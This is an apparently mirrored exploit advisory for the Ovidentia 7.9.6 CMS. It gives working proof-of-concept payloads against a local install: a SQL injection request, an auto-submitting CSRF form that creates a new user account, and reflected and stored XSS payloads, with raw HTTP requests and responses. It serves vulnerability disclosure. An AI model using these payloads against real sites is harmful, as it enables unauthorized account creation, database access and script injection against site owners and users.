扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 |
########################################################### [~] Exploit Title: Ovidentia 7.9.6 Multiple Vulnerabilities [~] Author: sajith [~] version: Ovidentia 7.9.6 [~]Vendor Homepage: http://www.ovidentia.org/ [~] vulnerable app link:http://www.ovidentia.org/telecharger ########################################################### [1]SQL injection vulnerability Log into admin panel and access delegate functionality > managing administrators where &id parameter (shown below link) is vulnerable to sql injection http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=delegat&idx=mem&id=1 POC by sajith shetty: request: GET /cms/ovidentia-7-9-6/index.php?tg=delegat&idx=mem&id=1%27 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Cookie: OV146706993=62t0i0e1mc2r0r4elhdm967h95; bab_Tree.myTreeView= response: style="cursor: pointer" onclick="s=document.getElementById('babParam_1_5_0'); s.style.display=='none'?s.style.display='':s.style.display='none'">[+]</span><div style="display: none; background-color: #EEEECC" id="babParam_1_5_0">[C:\xampp\htdocs\cms\ovidentia-7-9-6\ovidentia\index.php]</div>) <i>called at</i> [C:\xampp\htdocs\cms\ovidentia-7-9-6\index.php:25]</pre><h2>Can't execute query : <br><pre>select * from bab_dg_admin where id_dg=1'</pre></h2> <p><b>Database Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1</b></p> <p>This script cannot continue, terminating. [2]CSRF vulnerability log into the admin portal and access the create user functionality http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=users&idx=Create&pos=A&grp= using csrf vulnerability it was possible to add new user. <head> <title>POC by sajith shetty</title> </head> <body> <form action="http://127.0.0.1/cms/ovidentia-7-9-6/index.php" enctype="multipart/form-data" method="post" id="formid"> <input type="hidden" name="user[sendpwd]" value="0" /> <input type="hidden" name="user[password1]" value="P@ssw0rd1" /> <input type="hidden" name="user[notifyuser]" value="0" /> <input type="hidden" name="grp" value="" /> <input type="hidden" name="idx" value="Create" /> <input type="hidden" name="user[password2]" value="P@ssw0rd1" /> <input type="hidden" name="user[givenname]" value="POC" /> <input type="hidden" name="pos" value="A" /> <input type="hidden" name="widget_filepicker_job_uid[]" value="52a35b7fac6c9" /> <input type="hidden" name="user[email]" value="poctester@xyz.com" /> <input type="hidden" name="user[nickname]" value="1234" /> <input type="hidden" name="user[sn]" value="test" /> <input type="hidden" name="tg" value="users" /> <input type="hidden" name="user[mn]" value="tester" /> </form> <script> document.getElementById('formid').submit(); </script> </body> </html> [3]Reflected XSS http://127.0.0.1/cms/ovidentia-7-9-6/index.php/foo"><img src=x onerror=prompt(1);> request: GET /cms/ovidentia-7-9-6/index.php/foo%22%3E%3Cimg%20src=x%20onerror=prompt(1);%3E HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Cookie: OV146706993=62t0i0e1mc2r0r4elhdm967h95 response: <div id="ovidentia_headbottomright"> <div> <!-- Icons based on Monoblack (look for Gnome by Matteo Landi) : http://linux.softpedia.com/developer/Matteo-Landi-3851.html --> <a href="http://127.0.0.1/cms/ovidentia-7-9-6/foo"><img src=x onerror=prompt(1);>" title="Home"><img src="https://www.exploit-db.com/exploits/30107/skins/theme_default/images/home-reflect.gif" alt="Home" title="Home" /></a> <!-- Script OVML: show the list of the buttons of quick accesses to functions by leaning on entries available in user section --> [4]Stored xss log into the admin portal and access mail functionlity and create new domain using link below http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=maildoms&idx=create&userid=0&bgrp=y here Name & Description field is vulnerable to stored XSS .payload:"><img src=x onerror=prompt(1);> request: POST /cms/ovidentia-7-9-6/index.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=maildoms&idx=create&userid=0&bgrp=y Cookie: OV146706993=62t0i0e1mc2r0r4elhdm967h95 Content-Type: application/x-www-form-urlencoded Content-Length: 301 tg=maildoms&idx=list&userid=0&bgrp=y&adddom=add&dname=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28111%29%3B%3E&description=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28222%29%3B%3E&accessmethod=pop3&inmailserver=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28333%29%3B%3E&inportserver=110&submit=Dom%E4ne+hinzuf%FCgen response: <td>Registrierte User</td> </tr> <tr class="BabSiteAdminFontBackground"> <td> <a href="https://www.exploit-db.com/exploits/30107/ http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=maildom&idx=modify&item=2&userid=0&bgrp=y">"><img src=x onerror=prompt(111);></a> </td> <td>"><img src=x onerror=prompt(222);></td> <td>Registrierte User</td> </tr> </table> </td> </tr> </table> <br> </div> |
体验盒子
